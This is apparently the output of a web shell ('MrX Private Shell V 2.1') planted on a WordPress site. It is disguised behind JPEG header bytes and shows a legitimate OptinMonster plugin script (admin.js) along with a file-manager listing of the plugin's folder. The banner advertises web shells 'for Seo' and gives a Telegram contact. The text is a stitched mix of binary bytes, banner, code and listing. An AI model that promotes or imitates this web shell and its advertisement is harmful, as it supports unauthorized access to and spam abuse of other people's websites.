����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* ==========================================================
* admin.js
* ==========================================================
* Copyright 2020 Awesome Motive.
* https://awesomemotive.com
* ========================================================== */
jQuery(document).ready(function ($) {
/**
* Updates links which correspond to Vue's router to use the Vue router instead,
* if it's available.
*
* @since 2.0.0
*
* @returns {void}
*/
function omapiHandleAppRouterLinks() {
const links = document.querySelectorAll('a[href*="?page=optin-monster-"]');
links.forEach((a) => {
a.addEventListener('click', (evt) => {
if (window.omWpApi && window.omWpApi.main) {
const router = window.omWpApi.main.app.$router;
const url = evt.target.search || evt.target.closest('a').search;
const route = router.getRouteForQuery(url);
if (route) {
if (window.omWpApi.elRemove) {
$(window.omWpApi.elRemove).remove();
}
evt.preventDefault();
router.push({ name: route.name });
}
}
});
});
}
omapiHandleAppRouterLinks();
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Elementor | Folder | 0755 |
|
|
| Utils | Folder | 0755 |
|
|
| admin.js | File | 1.08 KB | 0644 |
|
| block.json | File | 476 B | 0644 |
|
| editor.js | File | 11.13 KB | 0644 |
|
| elementor.js | File | 4.26 KB | 0644 |
|
| global.js | File | 1.86 KB | 0644 |
|
| helper.js | File | 4.35 KB | 0644 |
|
| mailpoet.js | File | 1.13 KB | 0644 |
|
| metabox.js | File | 1.88 KB | 0644 |
|
| om-format.js | File | 617 B | 0644 |
|
| om-settings.js | File | 632 B | 0644 |
|
| plugininstall.js | File | 2.06 KB | 0644 |
|
| wc-marketing.js | File | 1.53 KB | 0644 |
|